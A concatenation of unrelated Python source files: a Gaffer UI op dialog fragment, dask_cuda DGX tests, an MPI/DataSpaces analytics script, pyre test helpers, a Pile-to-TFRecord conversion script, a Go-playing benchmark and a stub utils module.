GafferUI.EventLoop.addIdleCallback( IECore.curry( self.__finishExecution, result ) )
def __finishExecution( self, result ) :
if isinstance( result, IECore.Object ) :
if self.getModal() :
self.__resultOfWait = result
self.__initiateResultDisplay( result )
self.opExecutedSignal()( result )
self.postExecuteSignal()( self, result )
else :
self.__initiateErrorDisplay( result )
return False # remove idle callback
def __initiateErrorDisplay( self, exceptionInfo ) :
self.__progressIconFrame.setChild( GafferUI.Image( "failure.png" ) )
self.__progressLabel.setText( "<h3>Failed</h3>" )
self.__messageCollapsible.setCollapsed( False )
self.__backButton.setVisible( True )
self.__backButton.setText( "Cancel" )
self.__backButton.setEnabled( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ) )
self.__forwardButton.setVisible( True )
self.__forwardButton.setText( "Retry" )
self.__forwardButton.setEnabled( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( Gaffer.WeakMethod( self.__initiateParameterEditing ) )
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Debug,
"Python Traceback",
"".join( traceback.format_exception( *exceptionInfo ) )
)
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Error,
"Problem Executing {opName}".format( opName=self.__node.getParameterised()[0].typeName() ),
str( exceptionInfo[1] ),
)
self.__frame.setChild( self.__progressUI )
self.__forwardButton._qtWidget().setFocus()
self.__state = self.__State.ErrorDisplay
def __initiateResultDisplay( self, result ) :
# Although we computed a result successfully, there may still be minor problems
# indicated by messages the Op emitted - check for those.
problems = []
for level in ( IECore.Msg.Level.Error, IECore.Msg.Level.Warning ) :
count = self.__messageWidget.messageCount( level )
if count :
problems.append( "%d %s%s" % ( count, IECore.Msg.levelAsString( level ).capitalize(), "s" if count > 1 else "" ) )
if not problems :
# If there were no problems, then our post execute behaviour may
# indicate that we don't need to display anything - deal with
# those cases.
if self.__postExecuteBehaviour == self.PostExecuteBehaviour.Close :
self.__close()
return
elif self.__postExecuteBehaviour == self.PostExecuteBehaviour.None_ :
self.__initiateParameterEditing()
return
# Either the post execute behaviour says we should display the result, or we're
# going to anyway, because we don't want the problems to go unnoticed.
self.__progressIconFrame.setChild(
GafferUI.Image( "successWarning.png" if problems else "success.png" )
)
completionMessage = "Completed"
if problems :
completionMessage += " with " + " and ".join( problems )
self.__messageCollapsible.setCollapsed( False )
self.__progressLabel.setText( "<h3>" + completionMessage + "</h3>" )
self.__messageWidget.messageHandler().handle( IECore.Msg.Level.Info, "Result", str( result ) )
self.__backButton.setText( "Close" )
self.__backButton.setEnabled( True )
self.__backButton.setVisible( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ) )
self.__forwardButton.setText( "Again!" )
self.__forwardButton.setEnabled( True )
self.__forwardButton.setVisible( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( Gaffer.WeakMethod( self.__initiateParameterEditing ) )
if self.__postExecuteBehaviour in ( self.PostExecuteBehaviour.DisplayResultAndClose, self.PostExecuteBehaviour.Close ) :
self.__forwardButton.setVisible( False )
self.__frame.setChild( self.__progressUI )
self.__backButton._qtWidget().setFocus()
self.__state = self.__State.ResultDisplay
def __focusDefaultButton( self ) :
defaultButton = self.__defaultButton
if defaultButton == self.DefaultButton.FromUserData :
defaultButton = self.DefaultButton.OK
d = None
with IECore.IgnoredExceptions( KeyError ) :
d = self.__node.getParameterised()[0].userData()["UI"]["defaultButton"]
if d is not None :
for v in self.DefaultButton.values() :
if str( v ).lower() == d.value.lower() :
defaultButton = v
break
if defaultButton == self.DefaultButton.None_ :
self._qtWidget().setFocus()
elif defaultButton == self.DefaultButton.Cancel :
self.__backButton._qtWidget().setFocus()
else :
self.__forwardButton._qtWidget().setFocus()
def __messageCollapsibleStateChanged( self, collapsible ) :
if not collapsible.getCollapsed() :
# make the window bigger to better fit the messages, but don't make
# it any smaller than it currently is.
self.resizeToFitChild( shrink = False )
# remove our connection - we only want to resize the first time we
# show the messages. after this we assume that if the window is smaller
# it is because the user has made it so, and wishes it to remain so.
self.__messageCollapsibleStateChangedConnection = None
def __setUserDefaults( self, graphComponent ) :
if isinstance( graphComponent, Gaffer.Plug ) and hasattr( graphComponent, "getValue" ) :
with IECore.IgnoredExceptions( Exception ) :
Gaffer.Metadata.registerValue( graphComponent, "userDefault", graphComponent.getValue() )
for child in graphComponent.children() :
self.__setUserDefaults( child )
|
test_dgx.py
|
import multiprocessing as mp
import os
import dask.array as da
from dask_cuda import DGX
from distributed import Client
import numpy
import pytest
mp = mp.get_context("spawn")
ucp = pytest.importorskip("ucp")
psutil = pytest.importorskip("psutil")
def _check_dgx_version():
dgx_server = None
if not os.path.isfile("/etc/dgx-release"):
return dgx_server
for line in open("/etc/dgx-release"):
if line.startswith("DGX_PLATFORM"):
if "DGX Server for DGX-1" in line:
dgx_server = 1
elif "DGX Server for DGX-2" in line:
dgx_server = 2
break
return dgx_server
if _check_dgx_version() is None:
pytest.skip("Not a DGX server", allow_module_level=True)
# Notice, all of the following tests is executed in a new process such
# that UCX options of the different tests doesn't conflict.
# Furthermore, all tests do some computation to trigger initialization
# of UCX before retrieving the current config.
def _test_default():
with DGX() as cluster:
with Client(cluster):
res = da.from_array(numpy.arange(10000), chunks=(1000,))
res = res.sum().compute()
assert res == 49995000
def test_default():
p = mp.Process(target=_test_default)
p.start()
p.join()
assert not p.exitcode
def _test_tcp_over_ucx():
with DGX(enable_tcp_over_ucx=True) as cluster:
with Client(cluster) as client:
res = da.from_array(numpy.arange(10000), chunks=(1000,))
res = res.sum().compute()
assert res == 49995000
def check_ucx_options():
conf = ucp.get_config()
assert "TLS" in conf
assert "tcp" in conf["TLS"]
assert "sockcm" in conf["TLS"]
assert "cuda_copy" in conf["TLS"]
assert "sockcm" in conf["SOCKADDR_TLS_PRIORITY"]
return True
assert all(client.run(check_ucx_options).values())
def test_tcp_over_ucx():
p = mp.Process(target=_test_tcp_over_ucx)
p.start()
p.join()
assert not p.exitcode
def _test_tcp_only():
with DGX(protocol="tcp") as cluster:
with Client(cluster):
res = da.from_array(numpy.arange(10000), chunks=(1000,))
res = res.sum().compute()
assert res == 49995000
def test_tcp_only():
p = mp.Process(target=_test_tcp_only)
p.start()
p.join()
assert not p.exitcode
def _test_ucx_infiniband_nvlink(enable_infiniband, enable_nvlink):
cupy = pytest.importorskip("cupy")
if _check_dgx_version() == 1:
net_devices = [
"mlx5_0:1",
"mlx5_0:1",
"mlx5_1:1",
"mlx5_1:1",
"mlx5_2:1",
"mlx5_2:1",
"mlx5_3:1",
"mlx5_3:1",
]
elif _check_dgx_version() == 2:
net_devices = [
"mlx5_0:1",
"mlx5_0:1",
"mlx5_1:1",
"mlx5_1:1",
"mlx5_2:1",
"mlx5_2:1",
"mlx5_3:1",
"mlx5_3:1",
"mlx5_6:1",
"mlx5_6:1",
"mlx5_7:1",
"mlx5_7:1",
"mlx5_8:1",
"mlx5_8:1",
"mlx5_9:1",
"mlx5_9:1",
]
with DGX(
enable_tcp_over_ucx=True,
enable_infiniband=enable_infiniband,
enable_nvlink=enable_nvlink,
) as cluster:
with Client(cluster) as client:
res = da.from_array(cupy.arange(10000), chunks=(1000,), asarray=False)
res = res.sum().compute()
assert res == 49995000
def check_ucx_options():
conf = ucp.get_config()
assert "TLS" in conf
assert "tcp" in conf["TLS"]
assert "sockcm" in conf["TLS"]
assert "cuda_copy" in conf["TLS"]
assert "sockcm" in conf["SOCKADDR_TLS_PRIORITY"]
if enable_nvlink:
assert "cuda_ipc" in conf["TLS"]
if enable_infiniband:
assert "rc" in conf["TLS"]
return True
if enable_infiniband:
assert all(
[
cluster.worker_spec[k]["options"]["env"]["UCX_NET_DEVICES"]
== net_devices[k]
for k in cluster.worker_spec.keys()
]
)
assert all(client.run(check_ucx_options).values())
@pytest.mark.parametrize(
"params",
[
{"enable_infiniband": False, "enable_nvlink": False},
{"enable_infiniband": True, "enable_nvlink": True},
],
)
def test_ucx_infiniband_nvlink(params):
p = mp.Process(
target=_test_ucx_infiniband_nvlink,
args=(params["enable_infiniband"], params["enable_nvlink"]),
)
p.start()
p.join()
assert not p.exitcode
|
ana.py
|
# check the staging service
# if check the data
# if the data become meaningless
# write info to meta server
from mpi4py import MPI
import numpy as np
import dataspaces.dataspaceClient as dataspaces
import ctypes
import os
import time
import math
import timeit
import sys
from threading import Thread
import os
sys.path.append('../../../src/publishclient/pythonclient')
import pubsub as pubsubclient
sys.path.append('../../../src/metadatamanagement/pythonclient')
import metaclient
# input the coordinate of the points and return the index of grid in array
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
def getIndex(px, py, pz):
# TODO should add all boundry case
# only for lower case
r = 15
gridnum = 15
deltar = 1.0*r/gridnum
if (px < 0 or py < 0 or pz < 0 or px > gridnum*deltar or py > gridnum*deltar or pz > gridnum*deltar):
#print "out of the box "
#print [px,py,pz]
return -1
gnumx = math.floor((px-0)/deltar)
gnumy = math.floor((py-0)/deltar)
gnumz = math.floor((pz-0)/deltar)
index = int(gnumz*gridnum*gridnum + gnumy*gridnum+gnumx)
return index
def checkAndPublishEvent(gridDataArray_p1, gridDataArray_p2):
ifTargetEventHappen = True
massOriginInterest = [6, 0, 6]
targetValue = 7.5
massR = 4
# put the analysis into the simulation part
for i in range(massOriginInterest[0], massOriginInterest[0]+massR):
for j in range(massOriginInterest[1], massOriginInterest[1]+massR):
for k in range(massOriginInterest[2], massOriginInterest[2]+massR):
#print "index i j k (%d %d %d)" % (i,j,k)
#print nparray[i][j][k]
#print "index i j k (%d %d %d)" % (i,j,k)
#print nparray[i][j][k]
index = getIndex(i, j, k)
if (gridDataArray_p1[index] != targetValue):
ifTargetEventHappen = False
break
if (ifTargetEventHappen == True):
print (iteration)
# send publish event
detecttime = timeit.default_timer()
print (detecttime)
print ("publish to pub/sub broker")
#sendEventToPubSub(iteration)
ifFirstHappen = True
return
initp = 1.5
targetValue = 7.5
def checkDataPattern(gridDataArray_p1, gridDataArray_p2):
coord1 = []
coord2 = []
# get the index of red block in data 1
# print("caculate coord1")
break_flag=False
for x in range(15):
if(break_flag==True):
break
for y in range (15):
if(break_flag==True):
break
for z in range (15):
index = getIndex(x,y,z)
if (gridDataArray_p1[index]==targetValue):
coord1 = [x,y,z]
break_flag=True
#print(coord1)
break
# get the index of the red block in data 2
#print("caculate coord2")
break_flag=False
for x in range(15):
if(break_flag==True):
break
for y in range (15):
if(break_flag==True):
break
for z in range (15):
index = getIndex(x,y,z)
if (gridDataArray_p2[index]==targetValue):
coord2 = [x,y,z]
break_flag=True
#print(coord2)
break
distance = pow((coord2[0]-coord1[0]),2)+pow((coord2[1]-coord1[1]),2)+pow((coord2[2]-coord1[2]),2)
#print(distance)
if(distance>140 and distance<150):
return True
else:
return False
def checkDataPatternCenter(gridDataArray_p1):
massOriginInterest = [7, 7, 7]
targetValue = 7.5
index = getIndex(massOriginInterest[0], massOriginInterest[1], massOriginInterest[2])
if (gridDataArray_p1[index] == targetValue):
return True
else:
return False
# copy all conf.* file to current dir
serverdir = "/home1/zw241/dataspaces/tests/C"
confpath = serverdir+"/conf*"
copyCommand = "cp "+confpath+" ."
os.system(copyCommand)
# number of clients at clients end to join server
num_peers = 1
appid = 2
var_name = "ex1_sample_data"
lock_name = "my_test_lock"
if(len(sys.argv)!=2):
print("./analytics <iteration>")
exit(0)
iteration = int(sys.argv[1])
startanay = timeit.default_timer()
ds = dataspaces.dataspaceClient(appid,comm)
currIter = 0
lb = [15*15*15*rank]
ub = [15*15*15*(rank+1)-1]
def threadFunction():
# check the meta periodically
addrList =metaclient.getServerAddr()
addr = addrList[0]
# if the value is not NULL
while(1):
value=metaclient.getMeta(addr, "simend")
if(value=="NULL"):
time.sleep(0.1)
continue
else:
break
endsim = timeit.default_timer()
print("sim end, stop the ana")
os._exit(0)
thread = Thread(target = threadFunction)
thread.start()
#while (True):
version = 0
while (version<iteration):
#for version in range(iteration):
# ds.lock_on_read(lock_name)
# version = currIter
#print("get version")
#print(version)
#use read write lock here
#ds.lock_on_read(lock_name)
# use lock type = 1
getdata_p1,rcode = ds.get(var_name, version, lb, ub)
#ds.unlock_on_read(lock_name)
# check if data ok
if(rcode == -11):
print("data not avaliable for ts %d"%(version))
time.sleep(0.1)
continue
#lb = [3380]
#ub = [3380+3374]
#print("get version")
#print(version)
#getdata_p2 = ds.dspaces_get_data(var_name, version, lb, ub)
# time.sleep(1)
# publishe events to pubsub store
#print("get data1")
#print (getdata_p1)
#print("get data2")
#print (getdata_p2)
#patternHeppen = checkDataPattern(getdata_p1,getdata_p2)
patternHeppen = checkDataPatternCenter(getdata_p1)
#extra data read time is not being counted
time.sleep(0.01)
#if(currIter>=iteration):
# break
version=version+1
if(patternHeppen==True):
#the time used for data analysis
#fack calling the analytics here and find the data is meaningless after analysing
time.sleep(0.05)
print("---------patternHeppen at ts %d, simulation data is meaningless----------"%(version))
# write to the meta server (the data is meaningless)
#addrList =metaclient.getServerAddr()
#addr = addrList[0]
#metaclient.putMeta(addr, "meaningless", "meaningless info")
#break
addrList=metaclient.getServerAddr()
addr = addrList[0]
metaclient.Recordtime(addr, "SIM")
ds.finalize()
endanay = timeit.default_timer()
print("time span")
print(endanay-startanay)
addrList =metaclient.getServerAddr()
addr = addrList[0]
print("test get: ", metaclient.getMeta(addr, "testkey"))
|
setup.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import asyncio
import contextlib
import functools
import json
import os
import socketserver
import tempfile
import threading
from pathlib import Path
from typing import (
Any,
Awaitable,
Callable,
Generator,
Iterable,
Mapping,
Optional,
Type,
TypeVar,
)
from pyre_extensions import ParameterSpecification
from ..find_directories import CONFIGURATION_FILE, LOCAL_CONFIGURATION_FILE
TParams = ParameterSpecification("TParams")
T = TypeVar("T")
def ensure_files_exist(root: Path, relatives: Iterable[str]) -> None:
for relative in relatives:
full_path = root / relative
full_path.parent.mkdir(parents=True, exist_ok=True)
full_path.touch(exist_ok=True)
def ensure_directories_exists(root: Path, relatives: Iterable[str]) -> None:
for relative in relatives:
full_path = root / relative
full_path.mkdir(parents=True, exist_ok=True)
def write_configuration_file(
root: Path, content: Mapping[str, Any], relative: Optional[str] = None
) -> None:
if relative is None:
(root / CONFIGURATION_FILE).write_text(json.dumps(content))
else:
local_root = root / relative
local_root.mkdir(parents=True, exist_ok=True)
(local_root / LOCAL_CONFIGURATION_FILE).write_text(json.dumps(content))
@contextlib.contextmanager
def switch_working_directory(directory: Path) -> Generator[None, None, None]:
original_directory = Path(".").resolve()
try:
os.chdir(str(directory))
yield None
finally:
os.chdir(str(original_directory))
@contextlib.contextmanager
def switch_environment(environment: Mapping[str, str]) -> Generator[None, None, None]:
old_environment = dict(os.environ)
os.environ.clear()
os.environ.update(environment)
try:
yield
finally:
os.environ.clear()
os.environ.update(old_environment)
def async_test(func: Callable[TParams, Awaitable[T]]) -> Callable[TParams, T]:
"""
Simple Decorator to allow for asyncio test methods in a standard
`unittest.TestCase`.
"""
@functools.wraps(func)
def wrapper(*args: TParams.args, **kwargs: TParams.kwargs) -> T:
return asyncio.get_event_loop().run_until_complete(func(*args, **kwargs))
return wrapper
class TestServer(socketserver.ThreadingMixIn, socketserver.UnixStreamServer):
pass
@contextlib.contextmanager
def spawn_unix_stream_server_with_socket(
handler: Type[socketserver.BaseRequestHandler], socket_path: Path
) -> Generator[None, None, None]:
# Spawn a test server on another thread
server = TestServer(str(socket_path), handler)
server_thread = threading.Thread(target=server.serve_forever)
try:
server_thread.start()
yield
finally:
# Shutdown the server and terminate the test
server.shutdown()
server.server_close()
@contextlib.contextmanager
def spawn_unix_stream_server(
handler: Type[socketserver.BaseRequestHandler],
) -> Generator[Path, None, None]:
with tempfile.TemporaryDirectory() as socket_root:
socket_path = Path(socket_root) / "test.socket"
with spawn_unix_stream_server_with_socket(handler, socket_path):
yield socket_path
|
text2tfrecord.py
|
"""tokenization to bpe or character embeddings of text datasets"""
import argparse
import io
import multiprocessing
import os
import shutil
import time
import jsonlines
import requests
import simdjson
import tensorflow as tf
import zstandard
from google.cloud import storage
from transformers import GPT2TokenizerFast
parser = argparse.ArgumentParser()
parser.add_argument("--name", type=str, default="text",
help="Name of output files will be name_i.tfrecords where i is the number of the file")
parser.add_argument("--procs", type=int, default=2, help="Number of processes in multiprocessing")
parser.add_argument("--output_dir", type=str, default="gs://homebrewnlp-eu/the-token-pile/",
help="Where to put tfrecords (in a bucket)")
parser.add_argument("--int64", type=bool, default=True, help="Whether to encode as bytes or int64")
parser.add_argument("--buffer_size", type=int, default=2 ** 29, help="This is a minimum size, not a maximum size. "
"tfrecords will have this minimum size as well.")
parser.add_argument("--separator", type=str, default=chr(4),
help="separator to place between files in chunk mode."
"Default is \x04 (chr(4)) in case of byte encodings, "
"but should be changed to <|endoftext|> for BPE")
def file_generator(args, pid, procs):
base_url = 'http://eaidata.bmk.sh/data/pile/train/%s.jsonl.zst'
splits = 30
parse_fn = simdjson.Parser().parse
tmp_name = f".tmp.download.{pid}"
def _json_parser(x):
return parse_fn(x.encode()).as_dict()
for i in range(pid, splits, procs):
with requests.get(base_url.replace("%s", str(i).zfill(2)), stream=True) as r, open(tmp_name, 'wb') as f:
shutil.copyfileobj(r.raw, f)
with open(tmp_name, 'rb') as f:
for item in jsonlines.Reader(io.BufferedReader(zstandard.ZstdDecompressor().stream_reader(f)),
loads=_json_parser):
if isinstance(item, dict):
item = item['text']
if isinstance(item, list):
item = args.separator.join(item)
yield item
os.remove(tmp_name)
def create_tfrecords(args, pid, procs):
slash_idx = args.output_dir.find('/')
bucket_name, output_dir = args.output_dir[:slash_idx], args.output_dir[slash_idx + 1:]
bucket = storage.Client().get_bucket(bucket_name)
join = args.separator.join
prefix = f"{'int64' if args.int64 else 'bytes'}_{args.name}_"
encode = (GPT2TokenizerFast.from_pretrained('gpt2') if args.int64 else str).encode
files_processed = 0
tfrecord_count = 0
chunk = 0
buffer_size = 0
tokenized_files = []
last_write = start_time = time.time()
for f in file_generator(args, pid, procs):
buffer_size += len(f)
tokenized_files.append(f)
files_processed += 1
if buffer_size > chunk * args.buffer_size // 4:
print(f"Worker: {pid:{len(str(procs))}d} | Buffer: {buffer_size * 2 ** -20:.1f}MB | "
f"Files: {files_processed} - TFrecords: {tfrecord_count} | "
f"Wrote: {time.time() - last_write:.0f}s ago - Started: {time.time() - start_time:.0f}s ago",
end='')
chunk += 1
if buffer_size > args.buffer_size:
filename = f"{prefix}{tfrecord_count:_>6d}_{files_processed}_{buffer_size}.tfrecord"
joined = encode(join(tokenized_files))
tokenized_files.clear()
with tf.io.TFRecordWriter(filename) as writer:
if args.int64:
feature = {"text": tf.train.Feature(int64_list=tf.train.Int64List(value=joined))}
else:
feature = {"text": tf.train.Feature(bytes_list=tf.train.BytesList(value=[joined]))}
tf_example = tf.train.Example(features=tf.train.Features(feature=feature))
writer.write(tf_example.SerializeToString())
bucket.blob(f'{output_dir}{filename}').upload_from_filename(filename)
os.remove(filename)
chunk = 0
buffer_size = 0
tfrecord_count += 1
print("")
last_write = time.time()
def main():
args = parser.parse_args()
if not args.output_dir.endswith("/"):
args.output_dir = args.output_dir + "/"
if not args.output_dir.startswith("gs://"):
print("Output dir isn't a cloud bucket. Exiting.")
return
args.output_dir = args.output_dir[len('gs://'):]
processes = [multiprocessing.Process(target=create_tfrecords, args=(args, pid, args.procs)) for pid in
range(args.procs)]
for p in processes:
p.start()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
bm_go.py
|
"""
Go board game
"""
import math
from mpkmemalloc import *
import os
import gc
import threading
import psutil
import random
import pyperf
SIZE = 9
GAMES = 200
KOMI = 7.5
EMPTY, WHITE, BLACK = 0, 1, 2
SHOW = {EMPTY: '.', WHITE: 'o', BLACK: 'x'}
PASS = -1
MAXMOVES = SIZE * SIZE * 3
TIMESTAMP = 0
MOVES = 0
def to_pos(x, y):
return y * SIZE + x
def to_xy(pos):
y, x = divmod(pos, SIZE)
return x, y
class Square:
def __init__(self, board, pos):
self.board = board
self.pos = pos
self.timestamp = TIMESTAMP
self.removestamp = TIMESTAMP
self.zobrist_strings = [random.randrange(9223372036854775807)
for i in range(3)]
def set_neighbours(self):
x, y = self.pos % SIZE, self.pos // SIZE
self.neighbours = []
for dx, dy in [(-1, 0), (1, 0), (0, -1), (0, 1)]:
newx, newy = x + dx, y + dy
if 0 <= newx < SIZE and 0 <= newy < SIZE:
self.neighbours.append(self.board.squares[to_pos(newx, newy)])
def move(self, color):
global TIMESTAMP, MOVES
TIMESTAMP += 1
MOVES += 1
self.board.zobrist.update(self, color)
self.color = color
self.reference = self
self.ledges = 0
self.used = True
for neighbour in self.neighbours:
neighcolor = neighbour.color
if neighcolor == EMPTY:
self.ledges += 1
else:
neighbour_ref = neighbour.find(update=True)
if neighcolor == color:
if neighbour_ref.reference.pos != self.pos:
self.ledges += neighbour_ref.ledges
neighbour_ref.reference = self
self.ledges -= 1
else:
neighbour_ref.ledges -= 1
if neighbour_ref.ledges == 0:
neighbour.remove(neighbour_ref)
self.board.zobrist.add()
def remove(self, reference, update=True):
self.board.zobrist.update(self, EMPTY)
self.removestamp = TIMESTAMP
if update:
self.color = EMPTY
self.board.emptyset.add(self.pos)
# if color == BLACK:
# self.board.black_dead += 1
# else:
# self.board.white_dead += 1
for neighbour in self.neighbours:
if neighbour.color != EMPTY and neighbour.removestamp != TIMESTAMP:
neighbour_ref = neighbour.find(update)
if neighbour_ref.pos == reference.pos:
neighbour.remove(reference, update)
else:
if update:
neighbour_ref.ledges += 1
def find(self, update=False):
reference = self.reference
if reference.pos != self.pos:
reference = reference.find(update)
if update:
self.reference = reference
return reference
def __repr__(self):
return repr(to_xy(self.pos))
class EmptySet:
def __init__(self, board):
self.board = board
self.empties = list(range(SIZE * SIZE))
self.empty_pos = list(range(SIZE * SIZE))
def random_choice(self):
choices = len(self.empties)
while choices:
i = int(random.random() * choices)
pos = self.empties[i]
if self.board.useful(pos):
return pos
choices -= 1
self.set(i, self.empties[choices])
self.set(choices, pos)
return PASS
def add(self, pos):
self.empty_pos[pos] = len(self.empties)
self.empties.append(pos)
def remove(self, pos):
self.set(self.empty_pos[pos], self.empties[len(self.empties) - 1])
self.empties.pop()
def set(self, i, pos):
self.empties[i] = pos
self.empty_pos[pos] = i
class ZobristHash:
def __init__(self, board):
self.board = board
self.hash_set = set()
self.hash = 0
for square in self.board.squares:
self.hash ^= square.zobrist_strings[EMPTY]
self.hash_set.clear()
self.hash_set.add(self.hash)
def update(self, square, color):
self.hash ^= square.zobrist_strings[square.color]
self.hash ^= square.zobrist_strings[color]
def add(self):
self.hash_set.add(self.hash)
def dupe(self):
return self.hash in self.hash_set
class Board:
def __init__(self):
self.squares = [Square(self, pos) for pos in range(SIZE * SIZE)]
for square in self.squares:
square.set_neighbours()
self.reset()
def reset(self):
for square in self.squares:
square.color = EMPTY
square.used = False
self.emptyset = EmptySet(self)
self.zobrist = ZobristHash(self)
self.color = BLACK
self.finished = False
self.lastmove = -2
self.history = []
self.white_dead = 0
self.black_dead = 0
def move(self, pos):
square = self.squares[pos]
if pos != PASS:
square.move(self.color)
self.emptyset.remove(square.pos)
elif self.lastmove == PASS:
self.finished = True
if self.color == BLACK:
self.color = WHITE
else:
self.color = BLACK
self.lastmove = pos
self.history.append(pos)
def random_move(self):
return self.emptyset.random_choice()
def useful_fast(self, square):
if not square.used:
for neighbour in square.neighbours:
if neighbour.color == EMPTY:
return True
return False
def useful(self, pos):
global TIMESTAMP
TIMESTAMP += 1
square = self.squares[pos]
if self.useful_fast(square):
return True
old_hash = self.zobrist.hash
self.zobrist.update(square, self.color)
empties = opps = weak_opps = neighs = weak_neighs = 0
for neighbour in square.neighbours:
neighcolor = neighbour.color
if neighcolor == EMPTY:
empties += 1
continue
neighbour_ref = neighbour.find()
if neighbour_ref.timestamp != TIMESTAMP:
if neighcolor == self.color:
neighs += 1
else:
opps += 1
neighbour_ref.timestamp = TIMESTAMP
neighbour_ref.temp_ledges = neighbour_ref.ledges
neighbour_ref.temp_ledges -= 1
if neighbour_ref.temp_ledges == 0:
if neighcolor == self.color:
weak_neighs += 1
else:
weak_opps += 1
neighbour_ref.remove(neighbour_ref, update=False)
dupe = self.zobrist.dupe()
self.zobrist.hash = old_hash
strong_neighs = neighs - weak_neighs
strong_opps = opps - weak_opps
return not dupe and \
(empties or weak_opps or (strong_neighs and (strong_opps or weak_neighs)))
def useful_moves(self):
return [pos for pos in self.emptyset.empties if self.useful(pos)]
def replay(self, history):
for pos in history:
self.move(pos)
def score(self, color):
if color == WHITE:
count = KOMI + self.black_dead
else:
count = self.white_dead
for square in self.squares:
squarecolor = square.color
if squarecolor == color:
count += 1
elif squarecolor == EMPTY:
surround = 0
for neighbour in square.neighbours:
if neighbour.color == color:
surround += 1
if surround == len(square.neighbours):
count += 1
return count
def check(self):
for square in self.squares:
if square.color == EMPTY:
continue
members1 = set([square])
changed = True
while changed:
changed = False
for member in members1.copy():
for neighbour in member.neighbours:
if neighbour.color == square.color and neighbour not in members1:
changed = True
members1.add(neighbour)
ledges1 = 0
for member in members1:
for neighbour in member.neighbours:
if neighbour.color == EMPTY:
ledges1 += 1
root = square.find()
# print 'members1', square, root, members1
# print 'ledges1', square, ledges1
members2 = set()
for square2 in self.squares:
if square2.color != EMPTY and square2.find() == root:
members2.add(square2)
ledges2 = root.ledges
# print 'members2', square, root, members1
# print 'ledges2', square, ledges2
assert members1 == members2
assert ledges1 == ledges2, ('ledges differ at %r: %d %d' % (
square, ledges1, ledges2))
set(self.emptyset.empties)
empties2 = set()
for square in self.squares:
if square.color == EMPTY:
empties2.add(square.pos)
def __repr__(self):
result = []
for y in range(SIZE):
start = to_pos(0, y)
result.append(''.join(
[SHOW[square.color] + ' ' for square in self.squares[start:start + SIZE]]))
return '\n'.join(result)
class UCTNode:
def __init__(self):
self.bestchild = None
self.pos = -1
self.wins = 0
self.losses = 0
self.pos_child = [None for x in range(SIZE * SIZE)]
self.parent = None
def play(self, board):
""" uct tree search """
color = board.color
node = self
path = [node]
while True:
pos = node.select(board)
if pos == PASS:
break
board.move(pos)
child = node.pos_child[pos]
if not child:
child = node.pos_child[pos] = UCTNode()
child.unexplored = board.useful_moves()
child.pos = pos
child.parent = node
path.append(child)
break
path.append(child)
node = child
self.random_playout(board)
self.update_path(board, color, path)
def select(self, board):
""" select move; unexplored children first, then according to uct value """
if self.unexplored:
i = random.randrange(len(self.unexplored))
pos = self.unexplored[i]
self.unexplored[i] = self.unexplored[len(self.unexplored) - 1]
self.unexplored.pop()
return pos
elif self.bestchild:
return self.bestchild.pos
else:
return PASS
def random_playout(self, board):
""" random play until both players pass """
for x in range(MAXMOVES): # XXX while not self.finished?
if board.finished:
break
board.move(board.random_move())
def update_path(self, board, color, path):
""" update win/loss count along path """
wins = board.score(BLACK) >= board.score(WHITE)
for node in path:
if color == BLACK:
color = WHITE
else:
color = BLACK
if wins == (color == BLACK):
node.wins += 1
else:
node.losses += 1
if node.parent:
node.parent.bestchild = node.parent.best_child()
def score(self):
winrate = self.wins / float(self.wins + self.losses)
parentvisits = self.parent.wins + self.parent.losses
if not parentvisits:
return winrate
nodevisits = self.wins + self.losses
return winrate + math.sqrt((math.log(parentvisits)) / (5 * nodevisits))
def best_child(self):
maxscore = -1
maxchild = None
for child in self.pos_child:
if child and child.score() > maxscore:
maxchild = child
maxscore = child.score()
return maxchild
def best_visited(self):
maxvisits = -1
maxchild = None
for child in self.pos_child:
# if child:
# print to_xy(child.pos), child.wins, child.losses, child.score()
if child and (child.wins + child.losses) > maxvisits:
maxvisits, maxchild = (child.wins + child.losses), child
return maxchild
# def user_move(board):
# while True:
# text = six.moves.input('?').strip()
# if text == 'p':
# return PASS
# if text == 'q':
# raise EOFError
# try:
# x, y = [int(i) for i in text.split()]
# except ValueError:
# continue
# if not (0 <= x < SIZE and 0 <= y < SIZE):
# continue
# pos = to_pos(x, y)
# if board.useful(pos):
# return pos
def computer_move(board):
pos = board.random_move()
if pos == PASS:
return PASS
tree = UCTNode()
tree.unexplored = board.useful_moves()
nboard = Board()
for game in range(GAMES):
node = tree
nboard.reset()
nboard.replay(board.history)
node.play(nboard)
return tree.best_visited().pos
def versus_cpu():
random.seed(1)
board = Board()
return computer_move(board)
# if __name__ == "__main__":
def functionWorker(tname, allocate_pkey):
if allocate_pkey:
pkey_thread_mapper(tname)
kw = {}
if pyperf.python_has_jit():
# PyPy needs to compute more warmup values to warmup its JIT
kw['warmups'] = 50
runner = pyperf.Runner(**kw, loops=1)
runner.metadata['description'] = "Test the performance of the Go benchmark"
runner.bench_func('go', versus_cpu)
del runner
pymem_reset()
def dummyFunc(name):
pass
def main(params):
pymem_setup_allocators(0)
gc.disable()
workers = len(params) if (len(params)>0) else 1
runner = pyperf.Runner(loops = 1)
runner.argparser.add_argument("--cases")
runner.bench_func("Dummy init", dummyFunc, "main")
del runner
threads = []
for i in range(workers):
tname = 'Worker' + str(i)
threads.append(threading.Thread(target=functionWorker, args=[tname,1], name=tname))
for idx, thread in enumerate(threads):
thread.start()
thread.join()
pymem_reset_pkru()
result = {}
for activation in params:
result[activation] = "Finished thread execution"
process = psutil.Process(os.getpid())
print((process.memory_info().rss)/1024) # in bytes
return(result)
# if __name__ == '__main__':
# out = main({'activation1':{},'activation3':{},'activation4':{}, 'activation2': {},
# 'activation31':{},'activation33':{},'activation34':{}, 'activation32': {},
# 'activation45':{},'activation46':{},'activation47':{}, 'activation48': {}})
# process = psutil.Process(os.getpid())
# print((process.memory_info().rss)/1024) # in bytes
|
utils.py
|
#!/usr/bin/env/python
import numpy as np
import tensorflow as tf
import queue
import threading
import pickle
